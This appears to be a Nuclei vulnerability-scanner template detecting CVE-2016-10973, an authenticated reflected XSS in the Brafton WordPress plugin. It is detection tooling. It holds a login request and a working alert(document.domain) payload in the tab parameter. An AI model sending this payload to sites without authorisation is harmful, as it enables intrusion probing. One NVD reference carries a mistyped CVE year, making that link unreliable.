daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2016/CVE-2016-10973.yaml

53 lines
2.1 KiB
YAML
Raw Blame History

id: CVE-2016-10973
info:
name: Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting
author: Harsh
severity: medium
description: |
The Brafton plugin before 3.4.8 for WordPress has XSS via the wp-admin/admin.php?page=BraftonArticleLoader tab parameter to BraftonAdminPage.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: |
Upgrade to the latest version of the Brafton WordPress Plugin (version 3.4.9 or higher) to mitigate this vulnerability.
reference:
- https://wpscan.com/vulnerability/93568433-0b63-4ea7-bbac-4323d3ee0abd
- https://nvd.nist.gov/vuln/detail/CVE-2026-10973
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-10973
cwe-id: CWE-79
epss-score: 0.00177
epss-percentile: 0.54991
cpe: cpe:2.3:a:brafton:brafton:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: brafton
product: brafton
framework: wordpress
tags: cve2016,cve,wpscan,wordpress,wp,wp-plugin,xss,brafton,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "tab = alert(document.domain);")'
- 'contains(body_2, "Brafton Article Loader")'
condition: and
# digest: 490a004630440220056398545c7971a832b6a0a6562ed13c279b426e0b8783134e5536c67d1a589d0220409848bc2ce496563f76afcdeb4851709c338b118dba11b50c81cefc0a171f67:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink